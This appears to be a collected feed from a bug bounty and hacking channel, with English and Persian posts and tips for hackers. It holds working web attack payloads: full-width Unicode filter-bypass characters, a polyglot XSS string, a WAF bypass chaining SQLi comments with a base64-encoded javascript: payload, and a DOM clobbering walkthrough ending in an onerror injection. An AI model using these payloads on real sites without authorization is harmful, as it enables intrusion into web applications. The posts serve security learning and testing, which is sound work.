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I publish articles related to hacking and security for you, so let's learn together.💪

Contact: @Electro0ne Blogs: electro0nes.github.io
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#XSS #SQLi #CSTI
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Try the Full-Width version of the commonly used symbols for XSS/WAF/SQL filter bypass.

🔹< - %EF%BC%9C (\uff1c)
🔹> - %EF%BC%9E (\uff1e)
🔹\ - %EF%BC%BC (\uff3c)
🔹/ - %EF%BC%8F (\uff0f)
🔹' - %EF%BC%87 (\uff07)
🔹" - %EF%BC%82 (\uff02)
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1'"><img src=x onerror=.1|alert``>


https://x.com/viehgroup/status/1921769703086657800
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Fetch all relative URLs in next.js websites 🗡


const manifest = window.__BUILD_MANIFEST || {};const routes = Object.keys(manifest).filter(route => !route.startsWith("_")).sort();routes
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چقدر چنل باگ بانتی و امنیت زیاد شده😂
به جای چنلای کصشر تلگرامی(also here) برید خارجیارو توییتر دنبال کنید
اینجا چیز خاصی پیدا نمیشه😄
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Motivation comes and goes, and ultimately you can't rely on it if you want to achieve mastery in your craft. Come up with a habit ("I will hack for two hours every morning") or work on something else if you feel tired. I often get tired of manual testing, and I switch to writing code for a new tool or something similar, just to change the pace of work. Many hackers suffer from ADHD, and it can be difficult for them to focus on one specific thing; I believe that if you are doing anything, even listening to a hacker podcast, you are already doing well. Step by step, meter by meter. Manage your energy properly, and you will see that making progress becomes easier.


انگیزه می آید و می رود و در نهایت اگر بخواهید در حرفه خود به تسلط برسید نمی توانید به آن تکیه کنید. یک عادت داشته باشید ("من هر روز صبح دو ساعت هک خواهم کرد") یا اگر احساس خستگی کردید روی چیز دیگری کار کنید. من اغلب از تست دستی خسته می شوم و فقط برای تغییر سرعت کار، به نوشتن کد برای یک ابزار جدید یا چیزی شبیه به آن تغییر می کنم. بسیاری از هکرها از ADHD رنج می برند و تمرکز روی یک چیز خاص برای آنها دشوار است. من معتقدم که اگر هر کاری انجام می دهید، حتی به پادکست هکر گوش می دهید، در حال حاضر خوب انجام می دهید. گام به گام، متر به متر. انرژی خود را به درستی مدیریت کنید، خواهید دید که پیشرفت آسان تر می شود.
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Interesting way to bypass WAF when you need to use the </noscript> tag:
Inspired by: https://x.com/_0x999?s=21

meydi" or 1=/*</noscript>*/ -- - <XSS>


The WAF first checks for SQLi, so ignore the comment section.

e.g:


meydi" or 1=/*</noscript>*/ -- - x=/*<details open=\" ontoggle=x=atob;z=x`amF2YXNjcmlwdDphbGVydChvcmlnaW4p`;location=z */>


https://x.com/neotrony/status/1931790830336884973?s=2
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This is how DOM clobbering works.

When you create an element with an id, the browser automatically creates a global variable for that ID:


<a id="foo"></a>


Now
window.foo
points to that single element.

But when you create multiple elements with the same id:


<a id="foo"></a>
<a id="foo"></a>


Now

window.foo
becomes an HTMLCollection, not a single element.

Add a name attribute:


<a id="foo" name="bar" href="..."></a>


And

window.foo.bar
now points to that element (works in Chromium/WebKit browsers, but not Firefox).

Now combine that with a common JS pattern like:


var someObject = window.someObject || {};


This is meant to provide a fallback if the global doesn't exist. However, if
window.someObject
has been clobbered by injected HTML, the fallback silently trusts a DOM object instead of a real JS object.

Now imagine this JS logic:


let imgSrc = someObject.avatar;


If an attacker clobbered
someObject.avatar
with:

<a id=someObject></a>
<a id=someObject name=avatar href='cid:"onerror=alert(1)//'></a>

If HTML is set via innerHTML or similar, then this could render as:

<img src="cid:" onerror="alert(1)//"">
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How to survive the AI wave in #bugbounty:

- Learn to utilize AI in your hacking flow
- Don't worry too much because automated AI is never going to *fully* replace us. There are lots of programs out there which will be hard for an AI to test fully. 😡🤬

https://x.com/zseano/status/1938144252992884824?s=46
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Think like a developer, act like an attacker. Study how applications are built before you try to break them. Understanding architecture, common frameworks, authentication flows, and data handling patterns will give you a huge edge. Don’t chase bugs randomly — build hypotheses, validate them, and go deep. And most importantly, document everything. A disciplined hacker is a dangerous one. 😡😎

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